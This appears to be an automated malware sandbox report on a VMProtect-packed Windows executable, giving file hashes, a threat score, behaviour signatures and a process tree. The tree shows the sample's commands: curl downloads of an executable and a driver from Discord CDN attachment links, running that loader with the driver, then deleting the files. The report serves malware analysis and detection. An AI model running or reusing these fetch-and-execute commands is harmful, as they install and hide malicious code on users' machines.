Analysis

  • max time kernel
    117s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
  • submitted
    22/12/2023, 10:27

General

  • Target

    84dfe3e2c2c23431bf1016ea20d6c329.exe

  • Size

    5.4MB

  • MD5

    84dfe3e2c2c23431bf1016ea20d6c329

  • SHA1

    a550c42c27139a7b6342edefed46646847ef0e90

  • SHA256

    3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4

  • SHA512

    6a08f161325481c5ef1242ab3707935cdb24f54ec0b992a1a5fb459bea1be49ab68f949b578f39c3c5b61b0c834f03e82477171a1aec2a02a86bb3839825fac4

  • SSDEEP

    98304:UFKcieVSvNTwVaUSCBsZgw2PJ2Q9tv9aiayBgfBY1CXpmzL7J/C7dep4mh:UDObUSCZwmJ2Ud9paICOkobUep4W

Score
7/10

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
    "C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Color C
      2⤵
      PID:2668
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://discord.gg/7fhtVRZEC6
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2992
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
      2⤵
      PID:2740
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:2688
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:2580
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
      2⤵
      PID:1520
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:2076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
      2⤵
      PID:2052

Network

MITRE ATT&CK Enterprise v15

Downloads
